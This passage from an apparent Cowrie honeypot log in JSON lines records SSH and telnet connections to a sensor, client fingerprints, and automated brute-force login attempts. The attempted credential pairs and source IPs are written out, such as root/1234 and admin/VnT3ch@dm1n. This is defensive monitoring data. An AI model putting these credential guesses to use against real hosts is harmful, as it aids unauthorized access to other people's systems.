512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T02:55:27.345404Z","src_ip":"212.227.125.160","session":"3f6bb348c57a"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu","message":"login attempt [ubuntu/ubuntu] failed","sensor":"my-vps","timestamp":"2025-08-26T02:55:27.499324Z","src_ip":"212.227.125.160","session":"3f6bb348c57a"}
{"eventid":"cowrie.session.closed","duration":5.80858850479126,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:55:28.457921Z","src_ip":"38.54.108.55","session":"edc0519c524a"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:55:28.550996Z","src_ip":"212.227.125.160","session":"3f6bb348c57a"}
{"eventid":"cowrie.session.connect","src_ip":"38.54.108.55","src_port":60428,"dst_ip":"1.2.3.4","dst_port":23,"session":"4e69c18b51b3","protocol":"telnet","message":"New connection: 38.54.108.55:60428 (1.2.3.4:23) [session: 4e69c18b51b3]","sensor":"my-vps","timestamp":"2025-08-26T02:55:28.568188Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:55:29.453156Z","src_ip":"38.54.108.55","session":"4e69c18b51b3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T02:55:29.471240Z","src_ip":"38.54.108.55","session":"4e69c18b51b3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"3.3","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:55:32.816369Z","src_ip":"38.54.108.55","session":"4e69c18b51b3"}
{"eventid":"cowrie.session.closed","duration":4.252143383026123,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:55:32.820245Z","src_ip":"38.54.108.55","session":"4e69c18b51b3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54484,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9b0b86042ad","protocol":"ssh","message":"New connection: 212.227.235.229:54484 (1.2.3.4:22) [session: a9b0b86042ad]","sensor":"my-vps","timestamp":"2025-08-26T02:56:48.495163Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T02:56:49.131824Z","src_ip":"212.227.235.229","session":"a9b0b86042ad"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T02:56:49.132513Z","src_ip":"212.227.235.229","session":"a9b0b86042ad"}
{"eventid":"cowrie.login.success","username":"root","password":"Kalidas@123","message":"login attempt [root/Kalidas@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T02:56:52.205680Z","src_ip":"212.227.235.229","session":"a9b0b86042ad"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:56:52.886244Z","src_ip":"212.227.235.229","session":"a9b0b86042ad"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63258,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3be90192d31","protocol":"ssh","message":"New connection: 217.72.205.35:63258 (1.2.3.4:22) [session: a3be90192d31]","sensor":"my-vps","timestamp":"2025-08-26T02:57:17.626916Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:57:17.628919Z","src_ip":"217.72.205.35","session":"a3be90192d31"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.181","src_port":34146,"dst_ip":"1.2.3.4","dst_port":22,"session":"4b65f517447f","protocol":"ssh","message":"New connection: 93.123.109.181:34146 (1.2.3.4:22) [session: 4b65f517447f]","sensor":"my-vps","timestamp":"2025-08-26T02:57:35.524944Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T02:57:35.525902Z","src_ip":"93.123.109.181","session":"4b65f517447f"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T02:57:35.545223Z","src_ip":"93.123.109.181","session":"4b65f517447f"}
{"eventid":"cowrie.login.failed","username":"solv","password":"12","message":"login attempt [solv/12] failed","sensor":"my-vps","timestamp":"2025-08-26T02:57:35.604509Z","src_ip":"93.123.109.181","session":"4b65f517447f"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T02:57:36.625750Z","src_ip":"93.123.109.181","session":"4b65f517447f"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":36338,"dst_ip":"1.2.3.4","dst_port":22,"session":"f7daa27320ce","protocol":"ssh","message":"New connection: 45.88.8.186:36338 (1.2.3.4:22) [session: f7daa27320ce]","sensor":"my-vps","timestamp":"2025-08-26T03:00:28.489413Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T03:00:28.928384Z","src_ip":"45.88.8.186","session":"f7daa27320ce"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T03:00:28.930096Z","src_ip":"45.88.8.186","session":"f7daa27320ce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44978,"dst_ip":"1.2.3.4","dst_port":23,"session":"146bf1fcfd90","protocol":"telnet","message":"New connection: 212.227.125.160:44978 (1.2.3.4:23) [session: 146bf1fcfd90]","sensor":"my-vps","timestamp":"2025-08-26T03:00:29.078459Z"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:00:31.115424Z","src_ip":"45.88.8.186","session":"f7daa27320ce"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:00:32.191129Z","src_ip":"45.88.8.186","session":"f7daa27320ce"}
{"eventid":"cowrie.session.closed","duration":14.329341650009155,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:00:43.407718Z","src_ip":"212.227.125.160","session":"146bf1fcfd90"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":53842,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9e0dc525d25","protocol":"ssh","message":"New connection: 217.72.205.35:53842 (1.2.3.4:22) [session: c9e0dc525d25]","sensor":"my-vps","timestamp":"2025-08-26T03:04:05.276402Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:04:05.277545Z","src_ip":"217.72.205.35","session":"c9e0dc525d25"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49684,"dst_ip":"1.2.3.4","dst_port":23,"session":"669248c4dac7","protocol":"telnet","message":"New connection: 212.227.235.229:49684 (1.2.3.4:23) [session: 669248c4dac7]","sensor":"my-vps","timestamp":"2025-08-26T03:04:10.407396Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T03:04:11.532094Z","src_ip":"212.227.235.229","session":"669248c4dac7"}
{"eventid":"cowrie.session.closed","duration":3.36371111869812,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:04:13.771036Z","src_ip":"212.227.235.229","session":"669248c4dac7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36228,"dst_ip":"1.2.3.4","dst_port":23,"session":"85c95b1ae5ad","protocol":"telnet","message":"New connection: 212.227.235.229:36228 (1.2.3.4:23) [session: 85c95b1ae5ad]","sensor":"my-vps","timestamp":"2025-08-26T03:04:14.101885Z"}
{"eventid":"cowrie.session.closed","duration":5.254354476928711,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:04:19.356171Z","src_ip":"212.227.235.229","session":"85c95b1ae5ad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36262,"dst_ip":"1.2.3.4","dst_port":23,"session":"abf06b34a12a","protocol":"telnet","message":"New connection: 212.227.235.229:36262 (1.2.3.4:23) [session: abf06b34a12a]","sensor":"my-vps","timestamp":"2025-08-26T03:04:19.605374Z"}
{"eventid":"cowrie.session.closed","duration":2.3475842475891113,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:04:21.952890Z","src_ip":"212.227.235.229","session":"abf06b34a12a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59744,"dst_ip":"1.2.3.4","dst_port":23,"session":"08d60f819dcb","protocol":"telnet","message":"New connection: 212.227.235.229:59744 (1.2.3.4:23) [session: 08d60f819dcb]","sensor":"my-vps","timestamp":"2025-08-26T03:04:22.164991Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T03:04:23.620098Z","src_ip":"212.227.235.229","session":"08d60f819dcb"}
{"eventid":"cowrie.session.closed","duration":3.88773775100708,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:04:26.052660Z","src_ip":"212.227.235.229","session":"08d60f819dcb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59754,"dst_ip":"1.2.3.4","dst_port":23,"session":"a58a285b73b2","protocol":"telnet","message":"New connection: 212.227.235.229:59754 (1.2.3.4:23) [session: a58a285b73b2]","sensor":"my-vps","timestamp":"2025-08-26T03:04:26.261114Z"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-26T03:04:27.920641Z","src_ip":"212.227.235.229","session":"a58a285b73b2"}
{"eventid":"cowrie.session.closed","duration":3.873749017715454,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:04:30.134788Z","src_ip":"212.227.235.229","session":"a58a285b73b2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59766,"dst_ip":"1.2.3.4","dst_port":23,"session":"f73be8e98b72","protocol":"telnet","message":"New connection: 212.227.235.229:59766 (1.2.3.4:23) [session: f73be8e98b72]","sensor":"my-vps","timestamp":"2025-08-26T03:04:30.340893Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"VnT3ch@dm1n","message":"login attempt [admin/VnT3ch@dm1n] failed","sensor":"my-vps","timestamp":"2025-08-26T03:04:32.112632Z","src_ip":"212.227.235.229","session":"f73be8e98b72"}
{"eventid":"cowrie.session.closed","duration":4.161046266555786,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:04:34.501870Z","src_ip":"212.227.235.229","session":"f73be8e98b72"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55478,"dst_ip":"1.2.3.4","dst_port":23,"session":"f597a287432d","protocol":"telnet","message":"New connection: 212.227.235.229:55478 (1.2.3.4:23) [session: f597a287432d]","sensor":"my-vps","timestamp":"2025-08-26T03:04:34.718751Z"}
{"eventid":"cowrie.login.failed","username":"telnet","password":"telnet","message":"login attempt [telnet/telnet] failed","sensor":"my-vps","timestamp":"2025-08-26T03:04:35.898654Z","src_ip":"212.227.235.229","session":"f597a287432d"}
{"eventid":"cowrie.session.closed","duration":3.626376152038574,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:04:38.345028Z","src_ip":"212.227.235.229","session":"f597a287432d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55492,"dst_ip":"1.2.3.4","dst_port":23,"session":"ed556fa6892f","protocol":"telnet","message":"New connection: 212.227.235.229:55492 (1.2.3.4:23) [session: ed556fa6892f]","sensor":"my-vps","timestamp":"2025-08-26T03:04:38.585797Z"}
{"eventid":"cowrie.session.closed","duration":0.9499013423919678,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:04:39.535636Z","src_ip":"212.227.235.229","session":"ed556fa6892f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55494,"dst_ip":"1.2.3.4","dst_port":23,"session":"670cf723a919","protocol":"telnet","message":"New connection: 212.227.235.229:55494 (1.2.3.4:23) [session: 670cf723a919]","sensor":"my-vps","timestamp":"2025-08-26T03:04:39.789420Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-26T03:04:40.730137Z","src_ip":"212.227.235.229","session":"670cf723a919"}
{"eventid":"cowrie.session.closed","duration":3.5479536056518555,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:04:43.337304Z","src_ip":"212.227.235.229","session":"670cf723a919"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55992,"dst_ip":"1.2.3.4","dst_port":23,"session":"904bc9333718","protocol":"telnet","message":"New connection: 212.227.235.229:55992 (1.2.3.4:23) [session: 904bc9333718]","sensor":"my-vps","timestamp":"2025-08-26T03:04:43.610691Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"","message":"login attempt [admin/] failed","sensor":"my-vps","timestamp":"2025-08-26T03:04:45.665225Z","src_ip":"212.227.235.229","session":"904bc9333718"}
{"eventid":"cowrie.session.closed","duration":4.51386570930481,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:04:48.124462Z","src_ip":"212.227.235.229","session":"904bc9333718"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56004,"dst_ip":"1.2.3.4","dst_port":23,"session":"96ea68bf708e","protocol":"telnet","message":"New connection: 212.227.235.229:56004 (1.2.3.4:23) [session: 96ea68bf708e]","sensor":"my-vps","timestamp":"2025-08-26T03:04:48.437230Z"}
{"eventid":"cowrie.session.closed","duration":0.7807621955871582,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:04:49.217913Z","src_ip":"212.227.235.229","session":"96ea68bf708e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56016,"dst_ip":"1.2.3.4","dst_port":23,"session":"936bb9649864","protocol":"telnet","message":"New connection: 212.227.235.229:56016 (1.2.3.4:23) [session: 936bb9649864]","sensor":"my-vps","timestamp":"2025-08-26T03:04:49.450929Z"}
{"eventid":"cowrie.session.closed","duration":1.0281915664672852,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:04:50.479051Z","src_ip":"212.227.235.229","session":"936bb9649864"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56024,"dst_ip":"1.2.3.4","dst_port":23,"session":"1c2d4600c95d","protocol":"telnet","message":"New connection: 212.227.235.229:56024 (1.2.3.4:23) [session: 1c2d4600c95d]","sensor":"my-vps","timestamp":"2025-08-26T03:04:50.690904Z"}
{"eventid":"cowrie.login.success","username":"root","password":"1234","message":"login attempt [root/1234] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:04:52.054788Z","src_ip":"212.227.235.229","session":"1c2d4600c95d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:04:52.080263Z","src_ip":"212.227.235.229","session":"1c2d4600c95d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"2.3","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:04:54.395620Z","src_ip":"212.227.235.229","session":"1c2d4600c95d"}
{"eventid":"cowrie.session.closed","duration":3.71191143989563,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:04:54.402987Z","src_ip":"212.227.235.229","session":"1c2d4600c95d"}
{"eventid":"cowrie.session.connect","src_ip":"175.178.100.113","src_port":58664,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8849d141f93","protocol":"ssh","message":"New connection: 175.178.100.113:58664 (1.2.3.4:22) [session: b8849d141f93]","sensor":"my-vps","timestamp":"2025-08-26T03:06:10.425186Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T03:06:11.264665Z","src_ip":"175.178.100.113","session":"b8849d141f93"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T03:06:11.265393Z","src_ip":"175.178.100.113","session":"b8849d141f93"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:06:19.115365Z","src_ip":"175.178.100.113","session":"b8849d141f93"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":57572,"dst_ip":"1.2.3.4","dst_port":22,"session":"fcdd1b3c848f","protocol":"ssh","message":"New connection: 45.88.8.215:57572 (1.2.3.4:22) [session: fcdd1b3c848f]","sensor":"my-vps","timestamp":"2025-08-26T03:06:26.557669Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T03:06:27.030149Z","src_ip":"45.88.8.215","session":"fcdd1b3c848f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T03:06:27.031740Z","src_ip":"45.88.8.215","session":"fcdd1b3c848f"}
{"eventid":"cowrie.login.success","username":"root","password":"Kalidas@123","message":"login attempt [root/Kalidas@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:06:29.083533Z","src_ip":"45.88.8.215","session":"fcdd1b3c848f"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:06:29.417483Z","src_ip":"45.88.8.215","session":"fcdd1b3c848f"}
{"eventid":"cowrie.session.connect","src_ip":"185.242.226.17","src_port":43022,"dst_ip":"1.2.3.4","dst_port":22,"session":"5625c45cfadf","protocol":"ssh","message":"New connection: 185.242.226.17:43022 (1.2.3.4:22) [session: 5625c45cfadf]","sensor":"my-vps","timestamp":"2025-08-26T03:09:48.562800Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T03:09:48.564007Z","src_ip":"185.242.226.17","session":"5625c45cfadf"}
